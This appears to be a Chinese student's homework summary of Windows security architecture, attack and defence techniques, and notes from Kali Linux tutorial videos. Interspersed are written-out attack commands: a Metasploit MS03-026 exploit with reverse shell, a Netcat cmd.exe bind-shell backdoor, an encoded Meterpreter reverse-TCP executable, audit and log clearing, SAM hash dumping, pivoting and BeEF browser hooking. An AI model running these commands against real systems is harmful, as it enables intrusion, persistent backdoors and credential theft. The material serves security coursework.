1.Windows操作系統的基本結構

分為運行於處理器特權模式的操作系統內核，以及運行在處理器非特權模式的用戶空間代碼。采用宏內核模式來進行構架，這使得任意的內核模塊或設備驅動程序都可能破壞其他內核模塊數據，這種宏內核機制也使得Windows操作系統容易遭受以驅動方式植入內核的Rootkit的危害，為了避免這類攻擊，最新的Windows7缺省要求所以請求安裝進入內核執行的設備驅動程序都需要經過數字簽名，這能夠有效地提升內核的安全性。同時，由於用戶態程序對操作系統內核特權代碼和數據沒有直接訪問的權利，因此Windows內核模塊對惡意的用戶態程序具備完善的防禦能力。

2.Windows操作系統內核的基本模塊包括如下

Windows執行體、Windows內核體、設備驅動程序、硬件抽象層、Windows窗口與圖形界面接口內核實現代碼。

3.Windows操作系統在用戶態的代碼模塊則包括如下

系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。

4.Windows操作系統內核中實現了如下的核心機制

Windows進程和線程管理機制、Windows內存管理機制（Windows的虛擬內存空間分為系統核心內存區與用戶內存區間兩部分，系統核心內存用於映射內核、HAL、Win32k.sys等內核執行模塊，並存儲內核內存對象，對於內核中運行的特權代碼，則可通過DKOM技術來進行枚舉和操縱）、Windows文件管理機制（NTFS）、Windows註冊表管理機制（註冊表中的系統自啟動掛接點上註冊的應用軟件可以隨系統引導而自動運行，因此也是很多惡意代碼及流氓軟件普遍的攻擊目標）、Windows的網絡機制（從OSI網絡參考模型的物理層到應用層，各層上對應的Windows網絡組件模塊包括如下：①各層網卡硬件的設備驅動程序，處於OSI參考模型的物理層②NDIS庫及miniport驅動程序，位於OSI鏈路層③TDI，對應OSI網絡層與傳輸層④網絡APIDLL及TDI客戶端，對應OSI會話層與表示層⑤網絡應用程序與服務進程，對應OSI應用層）。

5.Windows安全體系結構

Windows操作系統基於引用監控器模型來實現基本的對象安全模型。系統中所有主體對客體的訪問都通過引用監控器作為中介，由引用監控器根據安全訪問控制策略來進行授權訪問，所有訪問記錄也都由引用監控器生成審計日誌。Windows操作系統實現基礎的安全機制，其中最核心的是位於內核的SRM安全引用監控器，以及位於用戶態的LSASS安全服務，它們與Winlogon/Netlogon及Eventlog等服務一起，實現了對主體用戶的身份認證機制，對所有資源對象的訪問控制機制，以及對訪問的安全審計機制。
Windows身份認證機制：Windows操作系統中以安全主體概念來包含所有進行系統資源訪問請求的實體對象，有用戶、用戶組和計算機三大類，對於每個安全主體，以時間和空間上都全局唯一的SID安全標識符來進行標識。賬戶權限的根本作用就是限制這些賬戶內運行程序對系統資源對象的訪問。Windows系統中擁有一些內建賬戶，如擁有最高權限的本地Administrator賬戶，作為自動運行系統進程環境的SYSTEM/LocalSystem賬戶，具有相對極少權限的Guest匿名訪問用戶，以及IUSR_Machinename IIS服務的匿名網絡訪問賬戶等。而這些賬戶在黑客眼中，本地Administrator和SYSTEM賬戶擁有最高的權限，是他們攻擊的終極目標。Windows系統的內建用戶組包括：本地最高權限用戶組Administrators、具有單一方面系統權限的Account/Backup/Server/Print Operators等操作組、用於容納服務賬戶的Network Service與Local Service用戶組，以及所有用戶賬戶所在的Users組等。 Windows用戶賬戶的口令字經過加密處理之後被保存於SAM或者活動目錄AD中，其中本地用戶賬戶口令信息經過不可逆的128位隨機密鑰Hash加密後存儲在SAM文件中，SAM存儲於%systemroot%\system32\config\sam文件系統路徑位置，並在註冊表的HKEY_LOCAL MACHINE\SAM存有副本。Windows域賬戶口令信息則保存在域控制器的活動目錄AD中，加密方式與單機平臺一致，存儲文件系統位置是域控制器的%systemroot%\ntds\ntds.dit路徑。Windows支持本地身份認證和網絡身份認證兩種方式，分別對在本地系統登錄和遠程網絡訪問的主主體進行合法性驗證。網絡身份認證過程由LSASS服務的Netlogon模塊主導完成。

6.Windows授權與訪問控制機制

Windows的授權與訪問控制機制是基於引用監控器模型，由內核中的SRM模塊與用戶態的LSASS服務共同來實施。在Windows服務器操作系統中，用戶可以執行內建的whoami命令來查看當前用戶的訪問令牌信息。Windows對於系統中所有需保護的資源都抽象成對象，具體類型包括文件、目錄、註冊表鍵值、內核對象、同步對象、私有對象、管道、內存、通信接口等，而對每個對象會關聯一個SD安全描述符，對象安全描述符由如下主要屬性組成：Owner SID、Group SID、DACL自主訪問控制列表、SACL系統審計訪問控制列表。

7.Windows安全審計機制

系統審計策略在本地安全策略中由系統管理員定義，來確定系統對那些事件進行記錄。

8.Windows的其他安全機制

身份認證、授權與訪問控制以及安全審計是三個基本安全功能。保護Windows系統安全穩定運行最為關鍵的三項安全措施——防火墻、補丁自動更新以及病毒防護。除安全中心之外，Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等。

9.目前Windows遠程攻擊技術可以分為以下幾大類

遠程口令猜測與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶。

10.Windows系統的安全漏洞生命周期

系統安全的本質核心在於安全漏洞、滲透攻擊及安全檢測防禦機制之間的攻防博弈與競賽。所有在安全社區中被公開披露和確認的安全漏洞都將進入到業界知名的CVE、NVD、SecurityFocus、OSVDB等幾個通用漏洞信息庫中。國內的安全漏洞信息庫包括由中國信息安全評測中心維護的中國“國家漏洞庫CNNVD”、由國際計算機網絡應急技術處理協調中心維護的“國家信息安全漏洞共享平臺CNVD”、安全廠商綠盟科技公司維護的綠盟漏洞信息庫，以及Sebug網站維護的SSVDB等。針對一個特定的主機系統目標，典型的滲透攻擊過程包括漏洞掃描測試、查找針對發現漏洞的滲透代碼、實施滲透測試這幾個環節。在查找安全漏洞所對應的滲透攻擊代碼資源時，需要註意的是並非每個已知安全漏洞都能夠在互聯網上獲取到滲透測試者所期望的滲透代碼。首先，並非每個已知安全漏洞都存在可用的滲透代碼，安全漏洞所在的軟件的流行度、漏洞的利用約束條件以及漏洞的危害後果類型等都影響了為該安全漏洞開發滲透攻擊代碼的價值，另外有些安全漏洞在利用之前就已經被軟件廠商所修補，那麽也可能導致沒人去開發相應的滲透代碼，另外一些安全漏洞的利用難度很大，也存在著特定時間裏沒人有技術能力寫出滲透代碼的情況，其次，並非所有的滲透代碼都是公開的，最後，獲取到的滲透代碼並非是對所有目標系統環境都適用的。可否達成測試者的預期目標則取決於滲透代碼和攻擊目標的軟件環境是否匹配。

11.使用Metasploit軟件實施滲透測試

Metasploit軟件采用開發框架和模塊組建的可擴展模型，以Ruby語言編寫的Metasploit Framework（MSF）庫作為整個軟件的基礎核心，為滲透測試組建的開發與測試提供平臺；模塊組建是真正實施滲透攻擊的代碼，包括利用安全漏洞的Exploits模塊，進行掃描、查點等其他輔助任務的Auxiliary模塊，在目標系統上植入和運行的Shellcode攻擊負載Payloads模塊，對攻擊負載進行編碼以躲避檢測的Encoders模塊，以及對攻擊負載進行填充的Nops模塊；Metasploit提供多種用戶接口，包括Console交互終端、命令行程序運行、Web交互界面以及GUI圖形化界面；Metasploit還提供了API接口及插件支持，來支持第三方在MSF基礎上開發擴展模塊，比如自動化的滲透測試例程等等。

12.使Metasploit Console終端實施滲透測試，只需運行如下命令

①use exploit/windows/dcerpc/ms03_026_dcom,選擇針對MS03_026漏洞的滲透攻擊模塊。②set PAYLOAD generic/shell reverse_tcp，選擇該滲透攻擊模塊適用的攻擊負載模塊。③set LHOST 192.168.200.2；set RHOST 192.168.200.124,配置該滲透攻擊模塊和攻擊負載模塊所必須配置的參數。④exploit，實施滲透攻擊過程。⑤在遠程控制會話中與目標主機進行交互，可能需要執行“sessions -I”列出當前已建立的遠程控制會話，並執行“sessions –i數字”在指定的供給控制會話中與遠程目標主機進行交互。

13.遠程口令字猜測

Windows通過基於服務器消息塊協議承載的文件與打印共享服務來為網絡用戶提供訪問文件系統和打印機的支持，而SMB協議也成為了攻擊者實施Windows遠程口令字猜測的傳統攻擊渠道。其他經常遭受遠程口令字猜測攻擊的Windows網絡服務還包括WMI服務、TS遠程桌面終端服務、MS SQL數據庫服務、SharePoint等使用Windows身份認證Web應用服務。SMB協議通常運行於TCP445端口與TCP139端口。在SMB服務決定授予網絡用戶對所請求的共享文件或打印機的訪問權之前，它會先對用戶身份進行驗證。攻擊者通常使用SMB默認開放的隱藏共享卷作為攻擊點，然後攻擊者需要目標系統的用戶名單作為猜測對象，然後根據提示輸入所猜測的Administrator賬戶的口令，就可以發動攻擊了。當然遠程口令字猜測成功的前提條件是大量系統中設置了具備弱口令字的用戶帳號。目前能夠自動執行Windows遠程口令字猜測的工具比較流行與常用的工具包括Legion、enum、SMBGrind、NTScan，以及國內較流行的XScan、小榕軟件之流光和NTScan漢化版等，這些遠程口令猜測工具往往需要配合一個包含“高概率口令”的字典文件來實施攻擊，對長度較短的口令也能夠進行窮舉暴力破解。對於運行於TCP1433和UDP1434端口的MS SQL Server，可以使用sqlbf、Auto-SQL等工具進行口令猜測破解。

14.遠程口令字交換通信竊聽與破解

第二種實施遠程口令字攻擊的經典技術是竊聽網絡上的口令字交換通信實施破解。應對遠程口令猜測與破解這種古老但仍然流行的攻擊方式，最根本的防禦措施仍然是通過安全培訓與教育來讓網絡中每個用戶都能夠設置較高安全強度的口令。此外，從技術方面，網絡系統管理員還可以實施如下措施，從而降低由於網絡中用戶設置過於簡單的口令所帶來的安全風險：①盡量關閉不必要開放的易受遠程口令猜測攻擊網絡服務，包括TCP 139/445端口的SMB服務、TCP135端口的WMI服務、TCP3389端口的TS終端服務以及TCP1433端口的MS SQL Server服務等。②配置主機防火墻來限制對上述端口的服務。③利用網絡防火墻來限制到這些服務的訪問。④應對遠程口令字交換通信竊聽與破解攻擊最基本的途徑是禁用過時而且存在本質上安全缺陷的LanMan與NTLM。⑤對於安全級別較高的Windows系統服務器等主機，管理員可以制定和實施強口令字策略，此外可以設置賬戶鎖定閾值，最後還可以在系統上激活帳戶登錄失敗事件審計功能。

15.Windows網絡服務遠程滲透攻擊

Windows操作系統默認開放135（TCP）、137（UDP）、138（UDP）、139（TCP）與445（TCP）端口，對應的網絡服務為MSRPC遠程調用服務、NetBIOS網絡基本輸入/輸出系統服務和SMB文件與打印共享服務。

16.針對NetBIOS網絡服務的著名漏洞及攻擊

NetBIOS網絡基本輸入輸出系統提供了Windows局域網聯網的基本支持，包括在UDP137端口上監聽的NetBIOS名字服務、UDP138端口上的NetBIOS數據報服務以及TCP139端口上的NetBIOS會話服務。

17.針對SMB網絡服務的著名漏洞及攻擊

服務消息塊SMB是Windows操作系統中最為復雜，也最容易遭受遠程滲透攻擊的網絡服務。SMB空會話是Windows網絡中影響範圍最廣和時間最長的安全弱點之一。

18.針對MSRPC網絡服務的著名漏洞及攻擊

MSRPC網絡服務是微軟Windows操作系統對DCE-RPC標準遠程過程調用機制的實現。遠程過程調用機制是現代操作系統最基本的支撐機制之一，允許一個應用程序能夠無縫地通過網絡調用遠程主機上網絡進程中的過程，在MSRPC實現中，可以采用如下的網絡傳輸協議：①ncacn_ip_tcp：TCP/IP傳輸協議，使用TCP135端口②ncadg_ip_udp:UDP/IP傳輸協議，使用UDP135端口③ncacn_np:SMB命名管道傳輸協議，使用SMB的TCP139或445端口④ncalrpc:本地網絡RPC傳輸⑤ncacn_http:HTTP傳輸協議，基於IIS服務，缺省配置在TCP593端口。支持遠程過程調用的服務進程啟動時，需要註冊自己的服務訪問點，接口標識符以及服務版本號，一個特殊的RPC服務——Portmapper將維護RPC服務數據庫，為網絡應用程序調用指定的RPC服務提供訪問點、接口與版本的查詢功能支持。

19.針對Windows系統上微軟網絡服務的遠程滲透攻擊

IIS Internet服務集成了HTTP、FTP、SMTP、POP、NNTP等網絡服務，並支持CGI、ASP、ISAPI等動態編程語言與接口，是微軟服務器軟件提供網站、電子郵件收發和文件共享服務的主要解決方案。MS SQL Server監聽TCP1433與UDP1434端口，支持使用Windows用戶賬號進行身份認證模式。MS SQL Server自建用戶身份認證模式，SQL Server數據庫服務的登陸賬號加密存儲與master數據庫的syslogins表中，並對用戶進行角色管理和授權訪問控制，同時提供訪問日誌功能，整體安全水平能夠達到C2級別。

20.網絡服務遠程滲透攻擊防範措施

針對Windows系統上的各種網絡服務遠程滲透攻擊，最基本的防範措施就是盡量避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞，具體包括如下：①從軟件設計開發根源上盡可能減少安全漏洞的出現②作為系統的使用者和管理員，應盡可能快地更新與應用軟件安全補丁③在安全漏洞從被意外公布和利用到補丁發布的這段“零日”漏洞時間，管理員對安全敏感的服務器應該測試和實施科永的攻擊緩解配置④利用服務軟件廠商及社區中提供的安全核對清單來對服務進行安全配置⑤通過漏洞掃描軟件來標識網絡中存在的以及安全漏洞並及時修補。

21.Windows本地特權提升

從受限用戶權限嘗試獲得特權賬戶的攻擊技術也被稱為特權提升，業內簡稱為“提權”。Windows系統上進行特權提升的共計途徑主要是通過DLL註入和破解本地程序安全漏洞。從技術上來說，獲得了Administrator權限並不意味著獲得了Windows系統的最高權限，Local System賬戶比Administrator賬戶的權限更高，比如Administrator不能在系統運行時刻讀取SAM位置註冊表鍵值，而Local System卻可以。有了Administrator權限，獲得Local System權限就很簡單了，一種方法是利用Windows的計劃任務服務，執行“atXX:XX/INTERACTIVE cmd.exe”打開一個命令Shell，該Shell的權限即為Local System；另一種方法是利用sysinternals的免費工具psexec，它甚至允許以遠程方式獲得和使用Local System權限。針對本地提權攻擊，與網絡服務的遠程滲透攻擊類似，最根本的防範措施就是及時給你的系統打好各種補丁。

22.Windows系統口令字密文提取技術

在本地獲取口令字密文的主要包括如下三種途徑：①從另一種操作系統啟動後拷貝文件系統中的口令密文文件②利用硬盤修復工具包中的rdisk工具，執行“rdisk/s-”命令創建SAM備份文件副本③使用pwdumpX系列工具直接從SAM文件或活動目錄中提取口令字密文。

23.LSA Aercrets通常位於HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets子鍵下，LSA Secrets收錄如下信息

①某些服務賬戶的明文口令字②本季系統最近10位用戶的口令字密文③FTP、Web用戶的明文口令字④RAS遠程訪問服務撥號賬戶的名字和口令字⑤用來訪問域控制器的計算機賬戶和口令字密文。

24.用戶敏感數據竊取

對於用戶在系統中的文件，攻擊者可以執行find、findstr、grep等命令行工具來實施查找，此外，攻擊者也可能使用鍵擊記錄器來對用戶鍵盤輸入進行監聽，並期望從中搜索用戶登陸某些應用軟件、網遊、金融網站的口令密碼。

25.本地敏感信息竊取防範措施

針對LSA Secrets和其他位置口令字的竊取與破解，目前這種攻擊普遍需要攻擊者已經具有Administrator的權限，在這種情況下，系統很難防止攻擊者獲取到這些信息，因此只能通過使用更安全的加密算法保護明文口令字，以及通過安全配置策略避免緩存關鍵服務器的銘感登陸口令信息，來盡量降低這種攻擊造成的安全風險。

26.Windows消蹤滅跡

①關閉審計功能（Windows Resource Kit工具包裏的auditpol程序可以讓他們輕易地關閉審計功能）②清理事件日誌（使用Event Viewer事件查看器來打開、讀取和清除這臺主機上的事件日誌）

27.Windows遠程控制與後門程序

攻擊者往往會在受控的系統中自主植入第三方的遠程控制與後門程序，主要分為命令行遠程控制工具、圖形化遠程控制工具這兩大類。Netcat工具是攻擊者們最常用的命令行遠程控制工具麽可以通過“nc-L-d-e cmd.exe-p 80”命令啟動後門服務，監聽所配置的TCP 80端口，並綁定cmd.exe這個Shell程序，當攻擊者使用Netcat作為客戶端連接目標主機的80端口時，就可以通過網絡直接訪問到目標主機上的cmd.exe來執行任意的操作。Meterpreter的設計目標包括如下：①隱蔽性②設計功能強大③靈活可擴展。

28.針對後門程序的防範措施

針對遠程控制後門程序，在一臺計算機已經懷疑遭受攻擊的Windows系統上，防禦者可以采用一些後門檢測軟件來嘗試發現攻擊者隱藏的後門程序，常用的檢測軟件包括反病毒廠商所提供的殺毒軟件，以及一些專業的後門及Rootkit檢測軟件。

Kali視頻第26-30集總結

1.Kali視頻第26集漏洞利用之檢索與利用總結

Searchsploit
1、工具簡介
這個項目是由Offensive Security發起的、基於exploit database官方漏洞數據庫源的漏洞搜索工具，可以直接在終端搜索漏洞相關信息，如漏洞簡介和漏洞驗證/利用腳本。
2、使用方法
在kali終端直接輸入“searchsploit -h”可以查看其相關參數用法：
light@kali:~# searchsploit -h
Usage : searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
OPTIONS
-c - Perform case-sensitive searches; by default,
searches will try to be greedy
-v - By setting verbose output, description lines
are allowed to overflow their columns
-h, --help - Show help screen

NOTES:

• Use any number of search terms you would like (minimum: 1)

• Search terms are not case sensitive, and order is irrelevant
  參數解釋：
  ?-c : 搜索是大小寫敏感
  ?-v : 詳細輸出
  
  3、使用示範
  比如我們要搜索windows上iis服務的遠程漏洞，可以使用以下命令：
  light@kali:~# searchsploit windows iis remote
  Description Path
  MS Windows IIS 5.0 - 5.1 - Remote Denial of | /windows/dos/35.c
  MS Windows Media Services (nsiislog.dll) Rem | /windows/remote/56.c
  MS Windows IIS SSL Remote Denial of Service | /windows/dos/176.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/189.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/190.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/191.pl
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/192.pl
  MS Windows IIS 5.0 SSL Remote buffer overflo | /windows/remote/275.c
  MS Windows IIS 5.0 (500-100.asp) Server Name | /windows/remote/1178.c
  MS Windows IIS SA WebAgent 5.2/5.3 Redirect | /windows/remote/1260.pm
  Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial | /windows/dos/3965.pl
  Microsoft IIS <= 5.1 Hit Highlighting Authen | /windows/remote/4016.sh
  Oracle WebLogic IIS connector JSESSIONID Rem | /windows/remote/8336.pl
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8704.txt
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8754.patch
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8765.php
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8806.pl
  Microsoft IIS 5.0/6.0 FTP Server Remote Stac | /windows/remote/9541.pl
  Microsoft IIS 5.0 FTP Server Remote Stack Ov | /windows/remote/9559.pl
  Microsoft IIS ASP Multiple Extensions Securi | /windows/remote/10791.py
  Microsoft Internet Information Services (IIS | /windows/remote/14179.txt
  Windows 7 IIS7.5 FTPSVC UNAUTH‘D Remote DoS | /windows/dos/15803.py
  Microsoft IIS ISAPI w3who.dll Query String O | /windows/remote/16354.rb
  Microsoft IIS ISAPI nsiislog.dll ISAPI POST | /windows/remote/16355.rb

  2.Kali視頻第27集漏洞利用之Metasploit基礎總結

  Metasploitable在滲透測試中經常被用到，實際上這套軟件包括了很多工具，這些工具組成了一個完整的攻擊框架。
  一、啟動服務
  在Kali中使用metaaploie，需要先開啟PostgreSQL數據庫服務和metasploit服務，然後就可以完整的利用msf數據查詢exploit和記錄。
  service postgresql start service metasploit start
  如果不想每次開機都手工啟動服務，可以配置隨系統啟動。
  update-rc.d postgresql enable
  update-rc.d metasploit enable
  

二、路徑介紹
Kali中msf的路徑為/usr/metasploit-framework
Auxiliary：輔助模塊，
encoders：供msfencode編碼工具使用，具體可以使用
msfencode –l
exploits：攻擊模塊 每個介紹msf的文章都會提到那個ms08_067_netapi，它就在這個目錄下。
payloads：其中列出的是攻擊載荷，也就是攻擊成功後執行的代碼。比如我們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。
post：後滲透階段塊，在獲得meterpreter的shell之後可以使用攻擊代碼。比如常用的hashdump、arp_scanner就在這裏。

三、基本命令
msfpayload：用來生成payload或者shellcode

搜索的時候可以用msfpayload -l |grep "windows"這樣的命令查詢。-o 選項可以列出payload所需的參數。
msfencode：
msf中的編碼器，早期為了編碼繞過AV，現常用msfpayload與它編碼避免exploit中的壞字符串。
msfconsole：開啟metasploit的concle
四、測試示例：發現漏洞，搜索exploit

前期掃描得知，目標21端口vsftpd服務版本為2.3.4，使用msfconsole打開msf的命令行版。
找到匹配項
選擇相應功能
設置遠程ip地址，端口號用21
攻擊成功

3.Kali視頻第28集漏洞利用之Meterpreter介紹總結

Meterpreter是Metasploit框架中的一個擴展模塊，作為溢出成功後的攻擊載荷使用，攻擊載荷在溢出攻擊成功以後給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpretershell的鏈接。
Meterpreter作為後滲透模塊有多種類型，並且命令由核心命令和擴展庫組成，極大地豐富了攻擊方式。其有很多有用的功能。
常用命令：
background：將當前會話放置後臺
load/use：加載模塊
Interact：切換一個信道
migrate：遷移進程
run：執行一個已有模塊，輸入run後按兩下teb，會列出所有的已有腳本。
Resource：執行一個已有的rc腳本常用的Meterpreter類型為：payload/windows/meterpreter/reverse_tcp
針對windows操作系統，反向連接shell，只用起來比較穩定。
一、生成Meterpreter後門
命令：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.132 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

在指定目錄，生成exe文件

生成一個後門就要打開一個監聽，接收返回的連接，查看需要的參數。需要兩個參數LHOST，LPORT。
將生成的文件模仿入侵的過程移動到靶機裏。
set LPORT 2333
set LHOST 192.168.75.132
exploit
background返回到msf裏
screenshot桌面截圖

4.kali視頻第29集Metasploit後滲透測試總結

怎樣設置跳板機？
在跳板機獲取一定權限後，需要積極地向內網主機權限發展，獲取指定的目標信息，探查系統的漏洞，借助Msf已經得到的Meterpreter後門，可以使後續操作更容易。
1、查看當前網卡、網段信息
先控制一臺跳板機，查看相關網卡網段信息
2、添加路由表 run autoroute -s 10.0.0.1
3、開Socks代理 通過使用 auxiliaryver/socks4a模塊，創建一個Socks代理，可以作為瀏覽器，Sqlmp，Namp等使用。
4、通過Background和sessions -i可以自由切換進入Session
5、輸入run可以看到Meterpreter上可以做的很多命令
6、獲取內網信息run arp_scanner -r 10.0.0.1/24
7、也可上傳文件，做端口轉發後續測試
8、應用程序/權限維持/Tunnel工具集
9、端口轉發 upload lcx.exe c:\

5.Kali視頻第30集漏洞利用之BeeF總結

對XSS漏洞需要強大框架的支持，如網上的XSS平臺。在Kali下，BeeF是一個不遜色於XSS平臺的工具。Beef是瀏覽器攻擊框架的簡稱，是一款專註於瀏覽器端的滲透測試工具。官網 http://beefproject.com/
1、命令行下啟動Beef beef-xss 此時瀏覽器自動訪問此頁面：http://127.0.0.1:3000/ui/authentication 使用默認用戶名beef與默認密碼beef登錄：
初始用戶名和密碼為：beef和beef 左側為目標的瀏覽器
2、假設被測試主機由於XSS漏洞請求到 http://192.168.11.152:3000/demos/basic.html
左側online browsers出現新的選項，其Current Browser中包括瀏覽器名稱、版本、操作系統版本等。
3、HOOK持續的時間為關閉測試頁面為止，在此期間，相當於被控制了，可以發送攻擊命令，在Commands模塊，我們可以完成很多任務：
其中，四種顏色分別表示：
該攻擊模塊可用，但隱蔽性強
該攻擊模塊可用，但隱蔽性差
該用戶模塊是否可用還有待驗證
該攻擊模塊不可用
選取MISC下Raw JavaScript模塊作為測試用例
執行，查看返回結果，成功則顯示
4、代理Proxy功能
選中目標主機，點右鍵，在菜單中選中Use as Proxy；然後在Rider選項卡中的Forge Request編輯並發送想要發送的內容。

20179311《網絡攻防實踐》第七周作業